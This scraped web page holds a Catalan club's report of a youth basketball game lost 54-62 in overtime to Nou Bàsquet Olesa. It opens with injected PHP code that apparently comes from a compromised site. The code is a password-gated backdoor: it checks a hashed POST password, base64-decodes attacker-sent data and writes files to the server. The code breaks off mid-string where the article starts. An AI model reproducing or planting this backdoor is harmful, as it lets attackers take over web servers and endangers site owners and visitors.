function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí A no pot tancar el partit quan el tenia a l'abast i perd contra el Nou Bàsquet Olesa a la pròrroga (54-62) - Tgn Bàsquet Club -

L’infantil masculí A no pot tancar el partit quan el tenia a l’abast i perd contra el Nou Bàsquet Olesa a la pròrroga (54-62)

Updated: febrer 12, 2019

L’equip infantil masculí A va quedar-se amb la mel als llavis contra el Nou Bàsquet Olesa. El conjunt lila tenia el partit a l’abast quan, a falta de 28 segons pel final guanyava per dos punts de diferència. Amb tot, va encaixar una cistella del seu rival i va desaprofitar l’últim atac per sentenciar. Deixant-ho tot obert a la pròrroga.

Tot i l’inicial domini visitant (7-18 en el primer quart), els nois que entrena Laureà Català s’han refet i gràcies a una bona defensa han equilibrat el matx tot i que al descans el resultat era de 19-33. El començament de la represa no ha estat massa esperançador perquè el marcador mostrava un 19-38 molt preocupant però l’augment de la intensitat defensiva en el que quedava de període ha obert les portes a l’esperança (42-44 3Q). Els triples han permès els liles capgirar el resultat però han desaprofitat la bona inèrcia per endur-se el triomf.

En el temps extra, el Nou Bàsquet Olesa es va mostrar superior i va guanyar el partit.